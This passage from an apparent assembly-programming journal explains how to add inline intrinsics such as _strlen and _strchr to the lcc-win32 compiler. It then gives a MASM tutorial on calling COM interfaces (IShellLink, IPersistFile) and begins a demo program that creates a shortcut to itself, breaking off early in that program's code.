The compiler recognizes intrinsic macros because they have an underscore as
the first character of their names, they are declared _stdcall, and they
appear in the intrinsics table. Functions that begin with an underscore are
few, so this avoids looking up the intrinsics table for each function call,
which would slow down compilation.
You then take the file intrin.c in the sources of lcc-win32 and modify the
intrinsics table. Its declaration is in the middle of the file, and looks
like this:
static INTRINSICS intrinsicTable[] = {
{"_fsincos",2, 0, fsincos, NULL },
{"_bswap", 1, 0, bswap, bswapArgs },
... many declarations omitted ...
{"_reduceLtb",3, 0, redCmpLtb, paddArgs },
{"_mmxDotProduct",3,0, mmxDotProd, paddArgs },
{"_emms",0, 0, emms, NULL },
{NULL, 0, 0, 0, 0 }
};
You add before the last line, the following line:
{"_strlen",1, 0, strlenGen, strlenArgs },
telling the system that you want an intrinsic called _strlen that takes one
argument, whose code will be generated by the function strlenGen(), and
whose arguments are assigned to their respective registers in the function
strlenArgs().
These functions should assign the registers in which you want the arguments
to the inline macro, and generate the code for the body of the macro.
Basically, these macros are seen as special calls by the compiler which,
instead of generating a push instruction, will call your <arguments>
function. That function should set the right fields in each node passed to
it, so that the code generator later generates a move to the registers
specified.
Note that all intrinsics should start with an underscore to avoid
conflicting with user space names.
When a call to this function is detected by the compiler, you will first be
called when pushing the arguments at each call site. Here is the function
strlenArgs() then:
static Symbol strlenArgs(Node p)
{
    Symbol r = NULL;
    // The global ArgumentsIndex is zero before each call. The compiler
    // takes care of that.
    switch (ArgumentsIndex) {
    case 0: // First argument pushed, from right to left!
        if (p->x.nestedCall == 0) {
            r = SetRegister(p, intreg[ECX]);
        }
        break;
    }
    // We have seen another argument
    ArgumentsIndex++;
    // Assign the register to this expression.
    if (p->x.nestedCall == 0 && r)
        p->syms[2] = r;
    // Should never be more than one argument
    if (ArgumentsIndex == 1)
        ArgumentsIndex = 0;
    return r;
}
You see that in several places we have the test:
if (p->x.nestedCall == 0)
This means that we should check if we have a nested call sequence within the
arguments, i.e. the following C expression:
strlen( SomeFunction() );
True, in the case of strlen this doesn't change anything important; the
result of the function will be in EAX anyway. But suppose you defined a
macro that takes two arguments, say, some special form of addition
sadd(a,b).
In this case we would assign the second argument (from left to right) to
ECX, and the first to EAX. Consider then the case of:
sadd( SomeFunction(),5);
If we just assigned 5 to ECX, then the call to SomeFunction() would destroy
the contents of ECX during the call!
This means that when the compiler detects a call within argument passing,
all arguments WILL BE on the stack, and our code-generating function should
take care of popping them into the right registers before proceeding.
In the case of strlen this can hardly happen, but it's important to see how
this would work in the general case.
Note too that the argument function should increase the global argument
counter for each argument, and reset it to zero when it's done. Again, this
is not necessary for strlen, but for macros that take more arguments it is
mandatory.
The SetRegister function takes care of the details of assigning a register.
Here is its short body:
Symbol SetRegister(Node p,Symbol r)
{
Symbol w;
w = p->kids[0]->syms[2];
if (w->x.regnode == NULL || w->x.regnode->vbl == NULL)
p->kids[0]->syms[2] = r;
return r;
}
This function tests that in the given node, the left child isn't already
assigned to a register. It will assign the register only if this is not the
case. Otherwise, the compiler will generate the move.
We come now to the center of the routine: Generating code for the strlen
utility.
static void strlenGen(Node p)
{
static int labelCount;
// OK, the first thing to do is to see if we should pop our arguments.
// If that is the case, pop them into the right registers.
if (p->x.nestedCall) {
print("\tpopl\t%%ecx\n");
}
/*
Here we generate the code for the strlen routine. Note that the % sign is
used
by the assembler of lcc-win32 to mark a register keyword, but our print()
function uses it too to mark (as printf) the beginning of an argument. We
must
double them to get around this collision.
1) Set the counter to minus one
*/
print("\torl\t$-1,%%eax\n");
/*
2) We should generate the label for this instance. All labels must be
unique,
and the easiest way to ensure that we always generate a new label is to
number
them consecutively using a counter. To avoid colliding with other labels, we
use a unique prefix too.
*/
print("_$strlen%d:\n",labelCount);
/*
3) Now we generate the code for the body of the loop searching for the
character zero.
*/
print("\tinc\t%%eax\n");
/* 4) Note the dollar before the immediate constant.*/
print("\tcmpb\t$0,(%%ecx,%%eax)\n");
/*
5) We generate the jump, incrementing our loop counter afterwards
*/
print("\tjnz\t_$strlen%d\n",labelCount++);
/*
Now we are done, the result is in eax, as it should. We finish our function.
Note that no pops are needed, since the ones we did at the beginning
(eventually) are just to compensate for the pushs the compiler generated.
Note too that we shouldn't insert a return statement since this is a macro
that shouldn't cause the current function to return!
*/
}
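The label-numbering trick used in strlenGen() can be tried outside the
compiler. The sketch below is not lcc-win32 code: emit_loop and the
"_$demo" prefix are invented for the illustration, and snprintf stands in
for the compiler's own print() function. It only shows how a static counter
gives every expansion its own label.

```c
#include <stdio.h>

/* Writes one expansion of a small loop into buf, using a fresh label
   number on every call. Returns the label number that was used. */
int emit_loop(char *buf, size_t size)
{
    static int labelCount;   /* persists across calls, as in strlenGen */
    int id = labelCount++;
    /* %% is needed for a literal % sign, exactly as with print() */
    snprintf(buf, size,
             "_$demo%d:\n"
             "\tinc\t%%eax\n"
             "\tjnz\t_$demo%d\n", id, id);
    return id;
}
```

Calling it twice yields two blocks of text whose labels differ, so the
macro can be expanded any number of times in one assembly file without a
duplicate label error.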
We compile the compiler, and we obtain a new compiler that will recognize
the
macro we have just created. Compiling the compiler with itself is a good
test
for your new function of course. This should be done at least three times to
be sure that your function is working OK.
Register assignments
--------------------
In general, you can use ECX, EDX, and EAX as you wish. The contents of EBX,
ESI, EBP and EDI should always be saved. If you destroy them unpredictable
results will surely occur.
Let's write a test function for our new compiler:
#include <stdio.h>
#ifdef MACRO
int _stdcall _strlen(char *);
#define strlen _strlen
#else
int strlen(char *);
#endif
int main(int argc, char *argv[])
{
    if (argc > 1)
        printf("Length of \"%s\" is %d\n", argv[1],
               strlen(argv[1]));
    return 0;
}
In the C source, we use the conditional MACRO to select whether we use our
macro or just generate a call to the normal strlen procedure, for
comparison purposes. We compile this with our new compiler, and add the -S
parameter to see what it is generating.
lcc -S -DMACRO tstrlen.c
The assembly (that the compiler writes in tstrlen.asm) is then:
_main:
pushl %ebp
movl %esp,%ebp
pushl %edi
.line 9
.line 10
cmpl $1,8(%ebp)
jle _$2
.line 11
movl 12(%ebp),%edi
; Our argument gets assigned to ECX, as our strlenArgs function
; defined
movl 4(%edi),%ecx
; Here is the begin of our macro body
orl $-1,%eax
; This is our generated label
_$strlen0:
inc %eax
cmpb $0,(%ecx,%eax)
jnz _$strlen0
; Our macro ends here, leaving its results in EAX
pushl %eax
movl 12(%ebp),%edi
pushl 4(%edi)
pushl $_$4
call _printf
addl $12,%esp
_$2:
.line 12
xor %eax,%eax
.line 13
popl %edi
popl %ebp
ret
We see that there is absolutely no call overhead. The arguments are
assigned to the right registers in our function strlenArgs, and the body is
expanded in-line by strlenGen.
Next, we link our executable:
D:\lcc\src74\test>lcclnk tstrlen.obj
And we run a test:
D:\lcc\src74\test>tstrlen abcde
Length of "abcde" is 5
D:\lcc\src74\test>
Here is the strlenGen() function again for clarity.
static void strlenGen(Node p)
{
static int labelCount;
if (p->x.nestedCall) {
print("\tpopl\t%%ecx\n");
}
print("\torl\t$-1,%%eax\n");
print("_$strlen%d:\n",labelCount);
print("\tinc\t%%eax\n");
print("\tcmpb\t$0,(%%ecx,%%eax)\n");
print("\tjnz\t_$strlen%d\n",labelCount++);
}
Another example: inlining the strchr function
---------------------------------------------
To demonstrate a function with two arguments, we inline the strchr function.
This function should return a pointer to the first occurrence of the given
character in a string, or NULL if the character doesn't appear in the
string.
The implementation could be like this:
_strchr:
movb (%eax),%dl // read a character
cmpb %cl,%dl // compare it to searched for char
je _strchrexit // exit if found with pointer to char as result
incl %eax // move pointer to next char
orb %dl,%dl // test for end of string
jne _strchr // if not zero continue loop
xorl %eax,%eax // Not found. Zero result
_strchrexit:
We just scan the characters looking for either zero (end of the string) or
the given char. The pointer to the string will be in EAX, and the character
to be
searched for will be in ECX. We use EDX as a scratch register.
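The same scan, written in C for comparison. This is a sketch only (the
name strchr_model is invented here); it follows the order of the assembly
exactly: compare first, advance, then test the byte just read for the end
of the string.

```c
#include <stddef.h>

char *strchr_model(char *s, int c)
{
    for (;;) {
        char d = *s;          /* movb (%eax),%dl            */
        if (d == (char)c)     /* cmpb %cl,%dl ; je exit     */
            return s;         /* pointer to the match       */
        s++;                  /* incl %eax                  */
        if (d == 0)           /* orb %dl,%dl ; jne loop     */
            return NULL;      /* xorl %eax,%eax             */
    }
}
```

Because the comparison comes before the end-of-string test, searching for
the character zero returns a pointer to the terminator, as the C library
strchr does.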
The next step is then, to write the strchr function for assigning the
arguments.
Here it is :
static Symbol strchrArgs(Node p)
{
Symbol r=NULL;
switch (ArgumentsIndex) {
case 0: // First argument (from right to left) char to be searched.
// We put it in ECX
if (p->x.nestedCall == 0) {
r = SetRegister(p,intreg[ECX]);
}
break;
case 1: // Second argument: pointer to the string. We put it in EAX
if (p->x.nestedCall == 0) {
r = SetRegister(p,intreg[EAX]);
}
break;
}
ArgumentsIndex++;
if (p->x.nestedCall == 0)
p->syms[2] = r;
if (ArgumentsIndex == 2)
ArgumentsIndex = 0;
return r;
}
The next step is finally to write the generating function. Here it is; note
that we need two labels:
static void strchrGen(Node p)
{
    static int labelCount;
    if (p->x.nestedCall) {
        // Both arguments are on the stack. They were pushed right to
        // left, so the string pointer is on top, the character below.
        print("\tpopl\t%%eax\n");
        print("\tpopl\t%%ecx\n");
    }
    print("_$strchr%d:\n",labelCount);
    print("\tmovb\t(%%eax),%%dl\n");
    print("\tcmpb\t%%cl,%%dl\n");
    print("\tje\t_$strchr%d\n",labelCount+1);
    print("\tinc\t%%eax\n");
    print("\torb\t%%dl,%%dl\n");
    print("\tjne\t_$strchr%d\n",labelCount);
    print("\txorl\t%%eax,%%eax\n");
    print("_$strchr%d:\n",labelCount+1);
    labelCount += 2;
}
This facility is not very common in a compiler system. It allows you to use
assembly language in the routines where it is *really* needed, leaving to
the compiler the tedious work of generating the assembly for you in the 90%
of the code where speed is not so important after all.
Another benefit is that you can't make simple mistakes when passing
arguments to your assembler macros, since they are understood as function
calls by the compiler, and all prototype checking is done by the front end.
If you attempt to use the strchr macro like this:
strchr('\n',string);
the compiler will issue an error.
The lcc-win32 system can be downloaded free of charge from
http://ps.qss.cz/lcc
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Accessing COM Objects from Assembly
by Ernest Murphy
Abstract
--------
COM (the Component Object Model) is used by the Windows operating system in
an increasing number of ways. For example, shell32.dll uses COM to access
some of its API methods. The IShellLink and IPersistFile interfaces of
shell32.dll will be used to demonstrate creating a shortcut (shell link). A
basic understanding of COM is assumed. The code sample included is MASM
specific.
Introduction
------------
COM may seem complicated with its numerous details, but in use these
complications disappear into simple function calls. The hardest part is
understanding the data structures involved so you can define the
interfaces. I apologize for all the C++ terminology used in here. While COM
is implementation neutral, it borrows much terminology from C++ to define
itself.
In order to use the COM methods of some object, you must first instantiate
(create) that object from its coclass, then ask it to return you a pointer
to its interface. This process is performed by the API function
CoCreateInstance. When you are done with the interface you call its Release
method, and COM and the coclass will take care of unloading the coclass.
Accessing COM Methods
---------------------
To use COM methods you need to know beforehand what the interface looks
like. Even if you "late bind" through an IDispatch interface, you still need
to know what IDispatch looks like.
A COM interface is just a table of pointers to functions. Let's start with
the IUnknown interface. If you were to create a component that simply
exports the IUnknown interface, you would have a fully functional COM
object (albeit on the level of "Hello World"). IUnknown has the 3 basic
methods of every interface, since all interfaces inherit from IUnknown.
Keep in mind that all an interface consists of is a structure of function
pointers. For IUnknown, it looks like this:
IUnknown STRUCT DWORD
    ; IUnknown methods
    QueryInterface  IUnknown_QueryInterface  ?
    AddRef          IUnknown_AddRef          ?
    Release         IUnknown_Release         ?
IUnknown ENDS
That's it, just 12 bytes long. It holds 3 DWORD pointers to the procedures
that actually implement the methods. It is the infamous "vtable" you may
have heard of. The pointers are defined as such so we can have MASM do some
type checking for us when compiling our calls.
Since the vtable holds the addresses of functions, or pointers, these
pointers are typedefed in our interface definition as such:
IUnknown_QueryInterface typedef ptr IUnknown_QueryInterfaceProto
IUnknown_AddRef typedef ptr IUnknown_AddRefProto
IUnknown_Release typedef ptr IUnknown_ReleaseProto
Finally, we define the function prototypes as follows:
IUnknown_QueryInterfaceProto typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto typedef PROTO :DWORD
IUnknown_ReleaseProto typedef PROTO :DWORD
In keeping with the MASM32 practice of "loose" type checking, function
parameters are just defined as DWORDs. It is a lot of work to set things up,
but it does keep lots of errors confined to compile time, not run time. In
practice, you can wrap up your interface definitions in include files and
keep them from cluttering up your source code.
One rather big complication in defining an interface: MASM cannot resolve
forward references like this, so we have to define them backwards, by
defining the function prototype typedefs first, and the interface table
last. The sample program later on defines the interfaces this way.
To actually use an interface, you need a pointer to it. The CoCreateInstance
API can be used to return us this indirect pointer to an interface
structure. It is one level removed from the vtable itself, and actually
points to the "object" that holds the interface. (This would be clearer had
I been creating the interface instead of using one. Please wait for a
future article for that.) The place this pointer points to in the object
points in turn to the interface structure. Thus, this pointer is
generically named "ppv", for "pointer to pointer to (void)," where (void)
means an unspecified type.
For example, say we used CoCreateInstance and successfully got an interface
pointer ppv, and wanted to see if it supports some other interface. We can
call its QueryInterface method and request a new ppv to the other interface
we are interested in. Such a call would look like this:
mov eax, ppv ; get pointer to the object
mov edx, [eax] ; and use it to find the interface structure
; and then call that method
invoke (IUnknown PTR [edx]).QueryInterface, ppv,
ADDR IID_SomeOtherInterface, ADDR ppv_new
I hope you find this as wonderfully simple as I do. IID_SomeOtherInterface
holds the GUID of the interface we desire, and ppv_new is a new pointer we
can use to access it. Also note we must pass in the pointer we used; this
lets the
interface know which object (literally "this" object) we are using.
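If the double indirection is hard to picture, the following C sketch may
help. It is not real COM: DemoObject, DemoVtbl and the demo_ functions are
invented for the illustration, and QueryInterface is left out to keep it
short. It shows only the layout (object -> vtable -> function) and the
passing of the object pointer as the first argument.

```c
#include <stdint.h>

typedef struct DemoObject DemoObject;

/* The interface: nothing but a table of function pointers. */
typedef struct {
    uint32_t (*AddRef)(DemoObject *self);
    uint32_t (*Release)(DemoObject *self);
} DemoVtbl;

/* The object: its first field points at the vtable. */
struct DemoObject {
    const DemoVtbl *vtbl;
    uint32_t refs;
};

static uint32_t demo_addref(DemoObject *self)  { return ++self->refs; }
static uint32_t demo_release(DemoObject *self) { return --self->refs; }

static const DemoVtbl demo_vtbl = { demo_addref, demo_release };

DemoObject demo_make(void)
{
    DemoObject o = { &demo_vtbl, 1 };
    return o;
}

/* Same shape as: mov eax, ppv / mov edx, [eax] / invoke [edx].AddRef, ppv */
uint32_t demo_call_addref(DemoObject *ppv)
{
    const DemoVtbl *vt = ppv->vtbl;   /* first dereference: the vtable  */
    return vt->AddRef(ppv);           /* second: the method, with THIS  */
}
```

The method only knows which object to work on because the caller hands the
object pointer back in as the first argument.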
Incidentally, in a previous APJ article on COM, there was an error in how a
COM interface is invoked. THIS was left out of the COM call. The program
seemed to work because the COM invoke was made from the main code, not from
a procedure, and did not require a return before calling ExitProcess. Had
this COM invoke been done from a procedure, a stack error crash would have
resulted.
Note the register must be type cast (IUnknown PTR [edx]). This lets the
compiler know what structure to use to get the correct offset in the vtable
for the .QueryInterface function (in this case it means an offset of zero
from edx). Actually, the information carried by the interface name and
function name disappears at compile time; all that is left is a numeric
offset from an as yet unspecified pointer value.
We can simplify a COM invoke further with a macro:
coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
    LOCAL istatement, arg
    ;; invokes an arbitrary COM interface
    ;; pInterface   pointer to a specific interface instance
    ;; Interface    the Interface's struct typedef
    ;; Function     which function or method of the interface to perform
    ;; args         all required arguments
    ;;              (type, kind and count determined by the function)
    istatement TEXTEQU <invoke (Interface PTR[eax]).&Function, pInterface>
    FOR arg, <args>
        ; build the list of parameter arguments
        istatement CATSTR istatement, <, >, <&arg>
    ENDM
    mov eax, pInterface
    mov eax, [eax]
    istatement
ENDM
Thus, the same QueryInterface method as before can be invoked in a single
line:
coinvoke ppv, IUnknown, QueryInterface, ADDR IID_SomeOtherInterface, ADDR ppv_new
The return value of every COM call is an hResult, a 4 byte return value in
eax. It is used to signal success or failure. Since the most significant
bit is used to indicate failure, you can test the result with a simple:
.IF !SIGN?
; function passed
.ELSE
; function failed
.ENDIF
Again, this can be simplified with some more simple macros:
SUCCEEDED TEXTEQU <!!SIGN?>
FAILED TEXTEQU <!!SUCCEEDED>
(The not ! sign must be doubled since that symbol has special meaning in
MASM macros)
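The same sign test, written out in C for comparison. The helper names
below are made up for this sketch (they are not the Windows SDK macros);
the point is only that a failure code is any value with bit 31 set.

```c
#include <stdint.h>

/* An hResult signals failure exactly when its most significant bit
   (bit 31) is set, i.e. when it is negative as a signed value. */
int hr_failed(uint32_t hr)    { return (hr & 0x80000000u) != 0; }
int hr_succeeded(uint32_t hr) { return !hr_failed(hr); }
```

For example, 0 (S_OK) and 1 (S_FALSE) both count as success, while
80004005h (E_FAIL) counts as failure.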
That's about all you need to fully invoke and use interfaces of COM objects
from assembly. These techniques work with any COM or ActiveX object.
Back to the Real World: Using IShellLink and IPersistFile from shell32.dll
--------------------------------------------------------------------------
The shell32.dll provides a simple, easy way to make shell links (shortcuts).
However, it uses a COM interface to provide this service. The sample below
is based on the MSDN "Shell Links" section for "Internet Tools and
Technologies." This may be a strange place to find documentation, but there
it is.
The "Shell Links" article may be found at
http://msdn.microsoft.com/library/psdk/shellcc/shell/Shortcut.htm
For this tutorial we will access the following members of the IShellLink and
the IPersistFile interfaces. Note every interface includes a "ppi" interface
parameter; this is the interface that we are calling (it is the THIS
parameter).
(The following interface information is a copy of information published by
Microsoft)
IShellLink::QueryInterface, ppi, ADDR riid, ADDR ppv
* riid: The identifier of the interface requested. To get access to the
* ppv: The pointer to the variable that receives the interface.
Description: Checks if the object also supports the requested interface. If
so, assigns the ppv pointer with the interface's pointer.
IShellLink::Release, ppi
Description: Decrements the reference count on the IShellLink interface.
IShellLink::SetPath, ppi, ADDR szFile
* pszFile: A pointer to a text buffer containing the new path for the shell
link object.
Description: Defines the file the shell link points to.
IShellLink::SetIconLocation, ppi, ADDR szIconPath, iIcon
* pszIconPath: A pointer to a text buffer containing the new icon path.
* iIcon: An index to the icon. This index is zero based.
Description: Sets which icon the shelllink will use.
IPersistFile::Save, ppi, ADDR szFileName, fRemember
* pszFileName: Points to a zero-terminated string containing the absolute
path of the file to which the object should be saved.
* fRemember: Indicates whether the pszFileName parameter is to be used as
the current working file. If TRUE, pszFileName becomes the current file and
the object should clear its dirty flag after the save. If FALSE, this save
operation is a "Save A Copy As ..." operation. In this case, the current
file is unchanged and the object should not clear its dirty flag. If
pszFileName is NULL, the implementation should ignore the fRemember flag.
Description: Performs a save operation for the ShellLink object; that is, it
saves the shell link we are creating.
IPersistFile::Release, ppi
Description: Decrements the reference count on the IPersistFile interface.
These interfaces contain many more methods (see the full interface
definitions in the code below), but we need only concentrate on those we
will actually be using.
A shell link is the MS-speak name for a shortcut icon. The information
contained in a link (.lnk) file is:
1 - The file path and name of the program to shell.
2 - Where to obtain the icon to display for the shortcut (usually from
the executable itself), and which icon in that file to use. We will
use the first icon in the file.
3 - A file path and name where the shortcut should be stored.
The use of these interfaces is simple and straightforward. It goes like
this:
* Call CoCreateInstance with CLSID_ShellLink for an IID_IShellLink interface
* Call IShellLink.QueryInterface for an IID_IPersistFile interface
* Call IShellLink.SetPath to specify where the shortcut target is
* Call IShellLink.SetIconLocation to specify which icon to use
* Call IPersistFile.Save to save our new shortcut .lnk file
* Call IPersistFile.Release
* Call IShellLink.Release
The last two steps release our hold on these interfaces, which will
automatically lead to the dll that supplied them being unloaded.
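Every method call in the list above is dispatched the same way: the
interface pointer leads to a table of function pointers (the vtable), the
method is picked by its position in that table, and the interface pointer
itself is passed as the first argument. The C sketch below models this with
a made-up three-method object. Counter, call_slot and the SLOT_ names are
all hypothetical and only stand in for a real COM interface; the sketch also
shows what happens when a definition leaves a method out.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical three-method interface, not a real COM interface. */
typedef struct Counter Counter;
typedef int (*Method)(Counter *self);   /* every method takes "this" first */

struct Counter {
    const Method *vtbl;   /* first field: pointer to the table of methods */
    int value;
};

static int counter_increment(Counter *self) { return ++self->value; }
static int counter_reset(Counter *self)     { self->value = 0; return 0; }
static int counter_get(Counter *self)       { return self->value; }

/* Correct definition: one index per method, in the object's own order. */
enum { SLOT_INCREMENT, SLOT_RESET, SLOT_GET, SLOT_COUNT };

/* Faulty definition with Reset left out: Get slides down into slot 1. */
enum { BAD_SLOT_INCREMENT, BAD_SLOT_GET };

static const Method counter_vtbl[SLOT_COUNT] = {
    counter_increment, counter_reset, counter_get
};

/* Fetch the vtable pointer from the object, pick a slot by number, and
   call it with the object as the first argument. */
static int call_slot(Counter *obj, size_t slot)
{
    assert(obj != NULL && slot < SLOT_COUNT);
    return obj->vtbl[slot](obj);
}
```

With an object set up as Counter c = { counter_vtbl, 0 }, the call
call_slot(&c, BAD_SLOT_GET) runs Reset rather than Get. Nothing crashes in
this toy case because all three methods share one signature; with real
stdcall methods of differing argument counts the stack would also be left
unbalanced.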
Again, the hard part in this application was finding documentation. What
finally broke the search open was using Visual Studio "Search in Files" to
find "IShellLink" and "IPersistFile" in the /include area of MSVC. This led
me to various .h files, from which I hand translated the interfaces from C
to MASM.
Another handy tool I could have used is the command line app
"FindGUID.exe," which looks through the registry for a specific interface
name or coclass, or will output a list of every class and interface with
their associated GUIDs. Finally, the OLEView.exe application will let you
browse the registry type libraries and mine them for information. However,
these tools come with MSVC and are proprietary.
Take care when defining an interface. Missing vtable methods lead to
strange results. Essentially COM calls, on one level, amount to "perform
function (number)" calls. Leave a method out of the vtable definition and
you call the wrong method. The original IShellLink interface definition I
used, from an inc file I downloaded, had a missing function. The calls I
made returned a "SUCCEEDED" hResult, but in some cases did not properly
clean the stack (since my push count did not match the invoked function's
pop count), which led to a GPF as I exited a procedure. Keep this in mind if
you ever get similar "weird" results.
MakeLink.asm, a demonstration of COM
------------------------------------
This program does very little, as all good tutorial programs should. When
run, it creates a shortcut to itself, in the same directory. It can be
amusing to run from file explorer and watch the shortcut appear. Then you
can try the shortcut and watch its creation time change.
The shell link tutorial code follows. It begins with some "hack code" to
get the full file name path of the executable, and also makes a string with
the same path that changes the file name to "Shortcut to MakeLink.lnk".
These strings are passed to the shell link interface, and it is saved (or
persisted in COM-speak).
The CoCreateLink procedure, which actually performs the COM method calls
that create the link, has been kept as general as possible, and may
have reuse possibilities in other applications.
;---------------------------------------------------------------------
; MakeLink.asm ActiveX simple client to demonstrate basic concepts
; written & (c) copyright April 5, 2000 by Ernest Murphy
;
; contact the author at ernie@...
;
; may be reused for any educational or
; non-commercial application without further license
;---------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\ole32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\ole32.lib
;---------------------------------------------------------------------
CoCreateLink PROTO :DWORD, :DWORD
;---------------------------------------------------------------------
; Interface definitions
; IUnknown Interface
IUnknown_QueryInterfaceProto typedef PROTO :DWORD, :DWORD, :DWORD
IUnknown_AddRefProto typedef PROTO :DWORD
IUnknown_ReleaseProto typedef PROTO :DWORD
IUnknown_QueryInterface typedef ptr IUnknown_QueryInterfaceProto
IUnknown_AddRef typedef ptr IUnknown_AddRefProto
IUnknown_Release typedef ptr IUnknown_ReleaseProto
IUnknown STRUCT DWORD
; IUnknown methods
QueryInterface IUnknown_QueryInterface ?
AddRef IUnknown_AddRef ?
Release IUnknown_Release ?
IUnknown ENDS
; IShellLink Interface
IShellLink_IShellLink_GetPathProto typedef PROTO :DWORD, :DWORD, :DWORD, :DWORD, :DWORD
IShellLink_GetIDListProto typedef PROTO :DWORD, :DWORD
IShellLink_SetIDListProto typedef PROTO :DWORD, :DWORD
IShellLink_GetDescriptionProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetDescriptionProto typedef PROTO :DWORD, :DWORD
IShellLink_GetWorkingDirectoryProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetWorkingDirectoryProto typedef PROTO :DWORD, :DWORD
IShellLink_GetArgumentsProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetArgumentsProto typedef PROTO :DWORD, :DWORD
IShellLink_GetHotkeyProto typedef PROTO :DWORD, :DWORD
IShellLink_SetHotkeyProto typedef PROTO :DWORD, :WORD
IShellLink_GetShowCmdProto typedef PROTO :DWORD, :DWORD
IShellLink_SetShowCmdProto typedef PROTO :DWORD, :DWORD
IShellLink_GetIconLocationProto typedef PROTO :DWORD, :DWORD, :DWORD, :DWORD
IShellLink_SetIconLocationProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetRelativePathProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_ResolveProto typedef PROTO :DWORD, :DWORD, :DWORD
IShellLink_SetPathProto typedef PROTO :DWORD, :DWORD
IShellLink_GetPath typedef ptr IShellLink_IShellLink_GetPathProto
IShellLink_GetIDList typedef ptr IShellLink_GetIDListProto
IShellLink_SetIDList typedef ptr IShellLink_SetIDListProto
IShellLink_GetDescription typedef ptr IShellLink_GetDescriptionProto
IShellLink_SetDescription typedef ptr IShellLink_SetDescriptionProto
IShellLink_GetWorkingDirectory typedef ptr IShellLink_GetWorkingDirectoryProto
IShellLink_SetWorkingDirectory typedef ptr IShellLink_SetWorkingDirectoryProto
IShellLink_GetArguments typedef ptr IShellLink_GetArgumentsProto
IShellLink_SetArguments typedef ptr IShellLink_SetArgumentsProto
IShellLink_GetHotkey typedef ptr IShellLink_GetHotkeyProto
IShellLink_SetHotkey typedef ptr IShellLink_SetHotkeyProto
IShellLink_GetShowCmd typedef ptr IShellLink_GetShowCmdProto
IShellLink_SetShowCmd typedef ptr IShellLink_SetShowCmdProto
IShellLink_GetIconLocation typedef ptr IShellLink_GetIconLocationProto
IShellLink_SetIconLocation typedef ptr IShellLink_SetIconLocationProto
IShellLink_SetRelativePath typedef ptr IShellLink_SetRelativePathProto
IShellLink_Resolve typedef ptr IShellLink_ResolveProto
IShellLink_SetPath typedef ptr IShellLink_SetPathProto
IShellLink STRUCT DWORD
QueryInterface IUnknown_QueryInterface ?
AddRef IUnknown_AddRef ?
Release IUnknown_Release ?
GetPath IShellLink_GetPath ?
GetIDList IShellLink_GetIDList ?
SetIDList IShellLink_SetIDList ?
GetDescription IShellLink_GetDescription ?
SetDescription IShellLink_SetDescription ?
GetWorkingDirectory IShellLink_GetWorkingDirectory ?
SetWorkingDirectory IShellLink_SetWorkingDirectory ?
GetArguments IShellLink_GetArguments ?
SetArguments IShellLink_SetArguments ?
GetHotkey IShellLink_GetHotkey ?
SetHotkey IShellLink_SetHotkey ?
GetShowCmd IShellLink_GetShowCmd ?
SetShowCmd IShellLink_SetShowCmd ?
GetIconLocation IShellLink_GetIconLocation ?
SetIconLocation IShellLink_SetIconLocation ?
SetRelativePath IShellLink_SetRelativePath ?
Resolve IShellLink_Resolve ?
SetPath IShellLink_SetPath ?
IShellLink ENDS
; IPersistFile Interface
IPersistFile_GetClassIDProto typedef PROTO :DWORD, :DWORD
IPersistFile_IsDirtyProto typedef PROTO :DWORD
IPersistFile_LoadProto typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveProto typedef PROTO :DWORD, :DWORD, :DWORD
IPersistFile_SaveCompletedProto typedef PROTO :DWORD, :DWORD
IPersistFile_GetCurFileProto typedef PROTO :DWORD, :DWORD
IPersistFile_GetClassID typedef ptr IPersistFile_GetClassIDProto
IPersistFile_IsDirty typedef ptr IPersistFile_IsDirtyProto
IPersistFile_Load typedef ptr IPersistFile_LoadProto
IPersistFile_Save typedef ptr IPersistFile_SaveProto
IPersistFile_SaveCompleted typedef ptr IPersistFile_SaveCompletedProto
IPersistFile_GetCurFile typedef ptr IPersistFile_GetCurFileProto
IPersistFile STRUCT DWORD
QueryInterface IUnknown_QueryInterface ?
AddRef IUnknown_AddRef ?
Release IUnknown_Release ?
GetClassID IPersistFile_GetClassID ?
IsDirty IPersistFile_IsDirty ?
Load IPersistFile_Load ?
Save IPersistFile_Save ?
SaveCompleted IPersistFile_SaveCompleted ?
GetCurFile IPersistFile_GetCurFile ?
IPersistFile ENDS
;---------------------------------------------------------------------
coinvoke MACRO pInterface:REQ, Interface:REQ, Function:REQ, args:VARARG
LOCAL istatement, arg
;; invokes an arbitrary COM interface
;; pInterface pointer to a specific interface instance
;; Interface the Interface's struct typedef
;; Function which function or method of the interface to perform
;; args all required arguments
;; (type, kind and count determined by the function)
istatement TEXTEQU <invoke (Interface PTR[eax]).&Function, pInterface>
FOR arg, <args>
; build the list of parameter arguments
istatement CATSTR istatement, <, >, <&arg>
ENDM
mov eax, pInterface
mov eax, [eax]
istatement
ENDM
; equate primitives
SUCEEDED TEXTEQU <!!SIGN?>
FAILED TEXTEQU <!!SUCEEDED>
MakeMessage MACRO Text:REQ
; macro to display a message box
; the text to display is kept local to
; this routine for ease of use
LOCAL lbl
LOCAL sztext
jmp lbl
sztext:
db Text,0
lbl:
invoke MessageBox,NULL,sztext,ADDR szAppName,MB_OK
ENDM
;---------------------------------------------------------------------
.data
szAppName BYTE "Shell Link Maker", 0
szLinkName BYTE "Shortcut to MakeLink.lnk", 0
szBKSlash BYTE "\", 0
hInstance HINSTANCE ?
Pos DWORD ?
szBuffer1 BYTE MAX_PATH DUP(?)
szBuffer2 BYTE MAX_PATH DUP(?)
;-----------------------------------------------------------------------
.code
start:
;---------------------------------------------
; this bracketed code is just a 'quick hack'
; to replace the filename from the filepathname
; with the 'Shortcut to' title
;
invoke GetModuleHandle, NULL
mov hInstance, eax
